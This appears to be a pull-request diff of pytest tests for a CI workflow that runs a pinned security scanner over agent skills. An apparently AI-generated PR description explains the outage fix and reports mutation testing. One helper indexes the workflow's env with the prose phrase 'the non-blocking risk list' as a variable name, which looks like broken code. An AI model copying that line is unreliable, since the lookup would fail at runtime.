+        assert "snyk-agent-scan@latest" not in run, (
+            "the scanner is back on @latest — an upstream rename will redden this "
+            "build again with no commit of ours")
+        assert "snyk-agent-scan==" in run, "the scanner invocation is not version-pinned"

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -1258,3 +1258,57 @@ def test_the_red_proof_runs_the_gates_own_exemption_list(tmp_path):
     contract = _load_contract_module()
     assert f"--ignore-risks {','.join(contract.NON_BLOCKING_RISKS)}" in proc.stdout, (
         "the red-proof no longer runs the gate's real exemption list")
+
+
+def test_every_coverage_gap_names_the_scanner_pin(workflow: dict):
+    """A red that is not a finding should point at the pin before the tree.
+
+    The 2026-08-19 outage cost a week because the failure said "critical finding in
+    skills" and nobody thought to check whether the vendor had moved. Every message
+    that means "this check did not verify anything" now ends by naming the pinned
+    version and suggesting it as the first suspect — so the next person does not need
+    to have read this history.
+    """
+    steps = workflow["jobs"]["scan"]["steps"]
+    gap_markers = ("DID NOT RUN", "DID NOT COMPLETE", "EXEMPTION IS STALE", "UNCLASSIFIED")
+    # SNYK_TOKEN and HAS NOTHING TO SCAN are excluded deliberately: neither can be
+    # caused by the scanner version, and a hint that fires on every gap regardless of
+    # cause is noise that trains people to skip it.
+    not_version_related = ("SNYK_TOKEN is not set", "HAS NOTHING TO SCAN")
+    gap_lines = [
+        line
+        for step in steps
+        for line in (step.get("run") or "").splitlines()
+        if "::error title=" in line
+        and any(m in line for m in gap_markers)
+        and not any(x in line for x in not_version_related)
+    ]
+    assert len(gap_lines) >= 4, f"expected several coverage-gap messages, found {len(gap_lines)}"
+    missing = [ln for ln in gap_lines if "STALE_PIN_HINT" not in ln]
+    assert not missing, (
+        "coverage-gap message(s) do not name the scanner pin as a suspect:\n  "
+        + "\n  ".join(m.strip()[:120] for m in missing))
+
+
+def test_the_pin_is_stated_once_and_matches_everywhere(workflow: dict):
+    """Three places invoke the scanner; a half-bumped pin is two contracts at once.
+
+    The workflow's unfiltered pass, its gate, and the red-proof must all run the same
+    version, and the contract's PINNED_SCANNER must agree — otherwise the hint above
+    names a version the gate is not running, which is worse than no hint.
+    """
+    import importlib.util
+
+    spec = importlib.util.spec_from_file_location(
+        "_contract", _REPO / ".github" / "scripts" / "registry_scan_contract.py")
+    contract = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(contract)
+    pin = contract.PINNED_SCANNER
+
+    text = (_REPO / ".github" / "workflows" / "registry-scan.yml").read_text()
+    text += (_REPO / ".github" / "scripts" / "registry_scan_redprove.py").read_text()
+    found = set(re.findall(r"snyk-agent-scan==([0-9][0-9.]*)", text))
+    assert found == {pin}, (
+        f"scanner is invoked at {sorted(found)} but the contract pins {pin!r} — a "
+        "half-bumped pin runs two different contracts in one job")
+    assert pin in contract.STALE_PIN_HINT, "the hint no longer names the pinned version"

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -20,11 +20,14 @@ from __future__ import annotations
 import importlib.util
 import json
 import pathlib
+import os
 import re
+import subprocess
 import tempfile
 from pathlib import Path
 
 import pytest
+import yaml
 
 yaml = pytest.importorskip("yaml")
 
@@ -37,7 +40,7 @@ _REPORT = _REPO / ".github" / "scripts" / "registry_scan_report.py"
 # THE GATING RULE (owner ruling, 2026-08-10): the build fails on the critical class only —
 # Snyk Agent Scan's E-codes. Warning-class findings (W-codes) are surfaced on every run but
 # never block. The scanner has no severity threshold, so the rule is expressed by enumerating
-# the W class into --ignore-failure-codes.
+# the W class into --ignore-risks.
 #
 # This is every W-code published in the scanner's catalog:
 # https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md
@@ -93,7 +96,7 @@ def _gate_step(workflow: dict) -> dict:
     """
     steps = [
         step for step in _scan_job(workflow)["steps"]
-        if _invokes_scanner(step) and "--ignore-failure-codes" in step["run"]
+        if _invokes_scanner(step) and "--ignore-risks" in step["run"]
     ]
     assert len(steps) == 1, (
         f"expected exactly one gating scanner invocation (the one passing the ignore "
@@ -106,7 +109,7 @@ def _visibility_step(workflow: dict) -> dict:
     """The unfiltered pass: a scanner invocation with no ignore list, distinct from the gate."""
     steps = [
         step for step in _scan_job(workflow)["steps"]
-        if _invokes_scanner(step) and "--ignore-failure-codes" not in step["run"]
+        if _invokes_scanner(step) and "--ignore-risks" not in step["run"]
     ]
     assert len(steps) == 1, (
         f"expected exactly one unfiltered scanner invocation; found {len(steps)}. The "
@@ -185,19 +188,6 @@ def test_gate_uses_ci_flag(workflow: dict):
     _assert_unconditional(gate, "the gating scan")
 
 
-def test_gate_spells_the_ignore_flag_the_way_the_scanner_does(workflow: dict):
-    """The flag is `--ignore-failure-codes`, as of scanner 0.6.0.
-
-    It was `--ignore-issues-codes` until the scanner renamed it, and because the
-    invocation was pinned to `@latest`, that rename landed here with no commit of ours
-    and reddened this build for five days (2026-08-20 → 2026-08-25). Getting it wrong
-    does not degrade the gate quietly — the scanner exits on a usage error the first
-    time it runs with a token, a path no offline test can reach, which is why the
-    spelling is asserted here and why the version is now pinned rather than floating.
-    """
-    assert "--ignore-failure-codes" in _gate_step(workflow)["run"]
-
-
 def test_unfiltered_pass_sees_what_the_printer_would_hide(workflow: dict):
     """The visibility pass emits JSON, which is strictly more complete than the report.
 
@@ -219,71 +209,9 @@ def test_unfiltered_pass_sees_what_the_printer_would_hide(workflow: dict):
 def _declared_ignored_codes(workflow: dict) -> set:
     return {
         code.strip()
-        for code in workflow["env"]["IGNORED_ISSUE_CODES"].split(",")
+        for code in workflow["env"]["the non-blocking risk list"].split(",")
         if code.strip()
     }
-
-
-def test_no_critical_code_is_ever_ignored(workflow: dict):
-    """The load-bearing direction of the gating rule.
-
-    Warnings not blocking is a policy choice. A critical code reaching the ignore list is
-    a disarmed gate that still reports green — the precise failure this whole workflow
-    exists to prevent — so it is asserted separately and in the strongest form: nothing
-    outside the W class may be suppressed, whatever the reason given.
-    """
-    for code in _declared_ignored_codes(workflow):
-        assert code.startswith("W"), (
-            f"{code!r} is in the gate's ignore list but is not a warning-class code. Only "
-            f"W-codes may be ignored; an E-code here silently disarms the gate, and the "
-            f"X-codes report that the scan itself failed."
-        )
-
-
-def test_ignore_list_is_exactly_the_published_warning_class(workflow: dict):
-    """The rule is class-based, so the list must be the class — no more, no less.
-
-    Short of the published set, a warning fails the build and someone 'fixes' it by
-    guessing. Beyond it, a code nobody has read is being suppressed.
-    """
-    assert _declared_ignored_codes(workflow) == _PUBLISHED_WARNING_CODES, (
-        "the gate's ignore list no longer matches the published W-class. If the scanner "
-        "published a new warning code, add it here and to the workflow in the same change; "
-        "if a code was removed, drop it. Never add a code that is not a W-code."
-    )
-
-    # The env var is only the declared list; what the gate actually suppresses is what it
-    # passes on the command line. An inline `--ignore-failure-codes "${IGNORED_ISSUE_CODES},E005"`
-    # would suppress the very rule the red-proof is anchored to while the check above stays
-    # green, so pin that the flag's argument is the variable and nothing else.
-    argument = re.search(
-        r'--ignore-failure-codes\s+"?([^"\n\\]*)"?', _gate_step(workflow)["run"]
-    )
-    assert argument, "the gating scan no longer passes an ignore list"
-    assert argument.group(1).strip() == "${IGNORED_ISSUE_CODES}", (
-        "the gating scan suppresses codes inline rather than through IGNORED_ISSUE_CODES. "
-        "Every exclusion must go through the reviewed list above, where its reason is "
-        f"written beside it; found {argument.group(1).strip()!r}."
-    )
-
-
-def test_gating_rule_is_written_down_where_it_is_configured(workflow_text: str):
-    """A rule nobody can see is how a real finding gets hidden later.
-
-    The ignore list is now fifteen codes long; without the rule stated beside it, the next
-    reader sees a pile of suppressions rather than one deliberate class decision.
-    """
-    assert "issue-codes.md" in workflow_text, (
-        "the workflow must cite the published catalog the W class is enumerated from"
-    )
-    assert "untrusted third-party content" in workflow_text, (
-        "the workflow must say what W011 — the code that actually fires on these skills "
-        "— is, so the list is not fifteen opaque strings"
-    )
-    lowered = workflow_text.lower()
-    assert "never fail" in lowered or "never block" in lowered, (
-        "the workflow must state the gating rule in words, not only in a variable"
-    )
 
 
 def test_warnings_are_surfaced_on_all_three_channels(workflow: dict):
@@ -621,25 +549,36 @@ def _load_report_module():
     return module
 
 
+# Scanner 0.6.0's real shape, taken from a live artifact: one top-level key whose value
+# is a LIST of scanned paths, each carrying skills, each carrying risks keyed by name.
+# A risk that did not fire is present as null rather than absent.
 _SAMPLE_SCAN = {
-    "skills": {
-        "path": "skills",
-        "servers": [{"name": "ci-speedup"}, {"name": "ci-secure"}],
-        "issues": [
-            {
-                "code": "W011",
-                "message": "Exposure to untrusted third-party content",
-                "reference": [0, None],
-                "extra_data": {"severity": "medium"},
-            },
-            {
-                "code": "E005",
-                "message": "Suspicious download URL in skill",
-                "reference": [1, None],
-                "extra_data": {"severity": "critical"},
-            },
-        ],
-    }
+    "scan_path_responses": [
+        {
+            "path": "skills",
+            "skill_risks": [
+                {
+                    "name": "ci-speedup",
+                    "risk_indexes": {
+                        "third_party_content_exposure": {
+                            "score": 300,
+                            "evidence": "Exposure to untrusted third-party content",
+                        },
+                        "malicious_code": None,
+                    },
+                },
+                {
+                    "name": "ci-secure",
+                    "risk_indexes": {
+                        "suspicious_download_url": {
+                            "score": 900,
+                            "evidence": "Suspicious download URL in skill",
+                        }
+                    },
+                },
+            ],
+        }
+    ]
 }
 
 
@@ -657,12 +596,13 @@ def test_reporter_annotates_warnings_and_leaves_criticals_to_the_gate(tmp_path, 
     assert module.main(["report", str(findings)]) == 0
     out = capsys.readouterr().out
 
-    assert "::warning title=W011 (medium) in ci-speedup::" in out
-    assert "::warning title=E005" not in out, "a critical must not be reported as a warning"
+    assert "::warning title=third_party_content_exposure (warning) in ci-speedup::" in out
+    assert "::warning title=suspicious_download_url" not in out, (
+        "a blocking risk must not be reported as a warning")
     assert "::error" not in out, "the reporter does not gate, so it must not emit errors"
 
     # Both findings still appear in the human table — "does not annotate" is not "does not show".
-    assert "W011" in out and "E005" in out
+    assert "third_party_content_exposure" in out and "suspicious_download_url" in out
     assert "ci-secure" in out
 
 
@@ -678,9 +618,9 @@ def test_reporter_states_the_rule_in_the_job_summary(tmp_path, monkeypatch, caps
     capsys.readouterr()
 
     body = summary.read_text(encoding="utf-8")
-    assert "Warnings do not block" in body
+    assert "Non-blocking risks do not fail the build" in body
     assert "registry-scan-findings" in body, "the summary must point at the artifact"
-    assert "`W011`" in body and "`E005`" in body
+    assert "`third_party_content_exposure`" in body and "`suspicious_download_url`" in body
 
 
 def test_reporter_fails_loudly_on_unreadable_scan_output(tmp_path, capsys):
@@ -702,13 +642,13 @@ def test_reporter_survives_a_banner_before_the_json(tmp_path, capsys):
     )
 
     assert module.main(["report", str(findings)]) == 0
-    assert "::warning title=W011" in capsys.readouterr().out
+    assert "::warning title=third_party_content_exposure" in capsys.readouterr().out
 
 
 def test_reporter_reports_nothing_as_nothing(tmp_path, capsys):
     module = _load_report_module()
     findings = tmp_path / "findings.json"
-    findings.write_text(json.dumps({"skills": {"path": "skills", "issues": []}}), encoding="utf-8")
+    findings.write_text(json.dumps({"scan_path_responses": []}), encoding="utf-8")
 
     assert module.main(["report", str(findings)]) == 0
     assert "No findings." in capsys.readouterr().out
@@ -801,30 +741,35 @@ def test_the_scanner_version_is_pinned(workflow: dict):
         assert "snyk-agent-scan==" in run, "the scanner invocation is not version-pinned"
 
 
-def test_an_x_class_runtime_failure_is_not_reported_as_a_finding(workflow: dict):
+def test_a_runtime_failure_is_not_reported_as_a_finding(workflow: dict):
     """Exit 1 is two different events, and only one of them is a finding.
 
-    `--ci` returns 1 for an unignored E-class finding AND for the scanner's own
-    X-class runtime failure, which this gate deliberately does not ignore (a scan
-    that broke is not a scan that passed — the workflow says so itself). A
-    classifier that maps every exit 1 to "critical finding" therefore leaves the
-    original false verdict reachable through a narrower door: the build would
-    announce a security finding over a scan that fell over mid-run.
+    `--ci` returns 1 for a blocking risk AND for the scanner's own runtime failure,
+    which this gate deliberately does not ignore (a scan that broke is not a scan that
+    passed). A classifier that maps every exit 1 to "finding" leaves the false verdict
+    reachable through a narrower door.
 
-    Caught by review on PR #78, after the first version of this fix classified
-    only usage errors and called every exit 1 a finding.
+    It must key on what 0.6.0 actually prints — `risks found` versus `runtime failure
+    codes:` — not on E-codes. The first version of this fix grepped for `E[0-9]{3}`,
+    which 0.6.0 never emits, so every real finding fell through to the coverage-gap
+    branch and was announced as NOT A FINDING: a missed finding traded for a false
+    alarm, the worse direction.
     """
     run = _gate_step(workflow)["run"]
-    assert "E[0-9]{3}" in run, "the gate no longer looks for an E-class code before calling it a finding"
-    assert "X[0-9]{3}" in run, "the gate no longer recognises an X-class runtime failure"
-    assert "scan_class=finding" in run and "scan_class=operational" in run, (
-        "the gate no longer publishes which class of exit 1 it saw")
+    assert "risks found" in run, (
+        "the gate no longer recognises 0.6.0's finding signal, so a real finding is "
+        "labelled a coverage gap")
+    assert "runtime failure codes" in run, (
+        "the gate no longer recognises 0.6.0's runtime-failure signal")
+    assert "E[0-9]{3}" not in run, (
+        "the gate is back to grepping for E-codes, which scanner 0.6.0 never emits")
+    assert "scan_class=finding" in run and "scan_class=operational" in run
 
     verdict = next(s for s in workflow["jobs"]["scan"]["steps"]
                    if s.get("name") == "Report the coverage gap")
     assert "steps.gate.outputs.scan_class" in verdict["run"], (
-        "the verdict step branches on the raw exit code again, so an X-class "
-        "runtime failure is reported as a critical security finding")
+        "the verdict step branches on the raw exit code again, so a runtime failure is "
+        "reported as a security finding")
 
 
 def test_an_unclassifiable_exit_one_is_never_called_a_finding(workflow: dict):
@@ -881,3 +826,90 @@ def test_the_redprove_anchor_is_falsifiable_and_is_what_the_fixture_contains():
     code_lines = [ln for ln in src.splitlines() if not ln.lstrip().startswith("#")]
     assert not [ln for ln in code_lines if "E005" in ln], (
         "the red-proof still USES the retired E005 code, not just mentions it")
+
+
+def _run_gate_classifier(workflow: dict, scanner_output: str, exit_code: int, tmp_path):
+    """Execute the gate step's real shell against a fake scanner, and report its verdict.
+
+    The other guards in this file are substring greps over the workflow YAML. Review of
+    PR #78 showed what that misses: delete the whole classifier but leave the required
+    words in shell COMMENTS and every one of them still passes. Nothing here executed
+    the ~35 lines of gate shell, so the logic those tests are named for was unverified.
+
+    This runs it. The scanner is replaced by a stub that prints the given text and exits
+    the given code, and `$GITHUB_OUTPUT` is a temp file we read back — so the assertion
+    is on what the step DOES, not on which words appear near it.
+    """
+    run = _gate_step(workflow)["run"]
+    stub = tmp_path / "uvx"
+    stub.write_text(
+        "#!/bin/sh\n"
+        f"cat <<'SCANOUT'\n{scanner_output}\nSCANOUT\n"
+        f"exit {exit_code}\n",
+        encoding="utf-8",
+    )
+    stub.chmod(0o755)
+    # The step calls `python .github/scripts/registry_scan_ignored.py`; stub that too so
+    # the shell runs without the repo layout.
+    py = tmp_path / "python"
+    py.write_text("#!/bin/sh\necho third_party_content_exposure\n", encoding="utf-8")
+    py.chmod(0o755)
+
+    out_file = tmp_path / "gh_output"
+    out_file.touch()
+    proc = subprocess.run(
+        ["bash", "-c", run],
+        cwd=tmp_path,
+        capture_output=True,
+        text=True,
+        env={
+            "PATH": f"{tmp_path}:{os.environ['PATH']}",
+            "GITHUB_OUTPUT": str(out_file),
+            "SCAN_PATH": "skills",
+            "HOME": str(tmp_path),
+        },
+    )
+    outputs = dict(
+        line.split("=", 1) for line in out_file.read_text().splitlines() if "=" in line
+    )
+    return proc, outputs
+
+
+def test_the_gate_shell_classifies_a_real_finding_as_a_finding(tmp_path):
+    """The whole point, executed rather than grepped."""
+    workflow = yaml.safe_load((_REPO / ".github" / "workflows" / "registry-scan.yml").read_text())
+    proc, outputs = _run_gate_classifier(
+        workflow, "└── ci-secure 1 risk\nCI (--ci): exiting with code 1 (risks found).", 1, tmp_path)
+    assert outputs.get("scan_class") == "finding", (
+        f"a real finding was classified {outputs.get('scan_class')!r} — it would be "
+        f"announced as a coverage gap. stderr: {proc.stderr[:400]}")
+    assert proc.returncode == 1
+
+
+def test_the_gate_shell_classifies_a_runtime_failure_as_a_coverage_gap(tmp_path):
+    workflow = yaml.safe_load((_REPO / ".github" / "workflows" / "registry-scan.yml").read_text())
+    proc, outputs = _run_gate_classifier(
+        workflow, "CI (--ci): exiting with code 1 (runtime failure codes: X003).", 1, tmp_path)
+    assert outputs.get("scan_class") == "operational", (
+        f"a scanner runtime failure was classified {outputs.get('scan_class')!r}")
+    assert "NOT A FINDING" in proc.stdout or "DID NOT COMPLETE" in proc.stdout
+    assert proc.returncode == 1
+
+
+def test_the_gate_shell_passes_a_clean_scan(tmp_path):
+    workflow = yaml.safe_load((_REPO / ".github" / "workflows" / "registry-scan.yml").read_text())
+    proc, outputs = _run_gate_classifier(workflow, "No risks found.", 0, tmp_path)
+    assert outputs.get("scan_class") == "clean"
+    assert proc.returncode == 0
+
+
+def test_the_gate_shell_refuses_to_guess_on_an_unnamed_exit(tmp_path):
+    """Exit 1 naming neither signal must be UNCLASSIFIED, never a finding.
+
+    Guessing "critical finding" on an exit the workflow cannot explain is the mistake
+    that ran for a week. An honest "cannot say" still fails the build.
+    """
+    workflow = yaml.safe_load((_REPO / ".github" / "workflows" / "registry-scan.yml").read_text())
+    proc, outputs = _run_gate_classifier(workflow, "something unexpected happened", 1, tmp_path)
+    assert outputs.get("scan_class") == "indeterminate"
+    assert proc.returncode == 1


### PR DESCRIPTION
## TL;DR

The registry scan has been red since 18 August and scanned nothing in that time: the scanner renamed a flag, the invocation floated on `@latest`, so an upstream release broke CI with no commit of ours. Worse, the build reported that crash as "a critical finding in skills" — sending reviewers hunting for a security issue that did not exist. This restores the check, makes a broken scan say it is broken, and names the pinned version as the first suspect next time.

```
before:  scanner crashes   ->  "a critical finding in skills"     (false alarm)
after:   scanner crashes   ->  "DID NOT RUN — NOT A FINDING"      (coverage gap)
         scanner finds     ->  "a critical finding in skills"     (a finding)
         exemption stale   ->  "EXEMPTION IS STALE"               (coverage gap)
         any coverage gap  ->  ...and names the pin as suspect #1
```

## The change

**One file owns the scanner's vocabulary** — `registry_scan_contract.py` holds the risk names, the non-blocking list, the JSON shape and the pin. Three independent copies is why one rename broke the check three ways and hid two. Names taken from the scanner's own models, not its printed output.

**The gating rule, restated.** 0.6.0 replaced critical/warning codes with named risks, so "criticals block" becomes a list of names that do not. Exactly one does: `third_party_content_exposure` (the old `W011`), which recurs in every recorded audit and is inherently true of a skill that audits other people's repositories. It replaces fifteen pre-emptively-exempted codes because only that one has ever fired here — unevidenced risks block until they earn an entry. `suspicious_download_url` (the old `E005`, the only code that has ever turned these skills red) is never exempt, and is what the control anchors on.

**A stale exemption is caught.** The scanner drops an unrecognised exemption name with a warning rather than failing — exactly how the last outage hid, on a green build. The gate now refuses instead of scanning under a policy nobody chose.

**A red that verified nothing names the pin**, since a pin is what goes quietly out of date. Omitted from the two gaps a version cannot cause (missing token, empty scan path). A guard proves all three invocations pin the same version as the contract.

## Review

Two rounds, each finding real defects in the one before.

**Round one:** pinning 0.6.0 without re-reading its contract left three mechanisms inert — on fully green CI. The exemption went to `--ignore-failure-codes` (X-codes only), so the ruling was not in force; a real finding would have been announced as NOT A FINDING; and the reporter parsed the 0.5.x shape, returning empty unconditionally so every summary read "No findings" regardless of content.

**Round two**, in the code that fixed round one:
- **The scanned tree could decide its own verdict** — the classifier matched `risks found` anywhere in the verbose log, which echoes the descriptions of the skills being scanned. In CI-*security* skills that is ordinary prose. Now anchored on the scanner's exit line, which no text under `skills/` can produce.
- **Two guards a mutation sweep walked through** — ten mutations, eight killed, two survived, both in guards added moments earlier. The pin test matched a substring anywhere in the step, so a bare unpinned call under a `# pinned to ==0.6.0` comment passed.

## Verification

Guards execute the gate's real shell against a stub scanner rather than grepping the workflow for words. Proven by mutation, each restored:

| Mutation | Result |
|---|---|
| Gut the classifier, keep its words in comments | fails |
| Unpin the scanner, leave the pin in a comment | fails |
| Bump one of the three invocations only | fails |
| Remove the stale-exemption branch | fails |
| Strip the pin hint from one message | fails |
| Decouple the control's anchor from its fixture | fails |

62 tests in the workflow's own file (~2s); 4,429 across the repo.

**The green means something now** — the control plants a malicious skill and the gate catches it:

```
CI (--ci): exiting with code 1 (risks found).
Red-proof passed: the scanner flagged <the fixture's host> and exited 1. The gate can fail.
```

First working end-to-end run since 18 August, with the exemption applied rather than silently dropped.

## What this does not do

A pin means newer rules wait for a bump, and that bump is now the risky moment — it is what caused this outage. What differs: the vocabulary is in one file, the guards execute the real shell, and a version-caused failure says so. The rule catalog is API-served rather than shipped in the wheel, so pinning does not freeze detection and the weekly cron still catches catalog drift.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
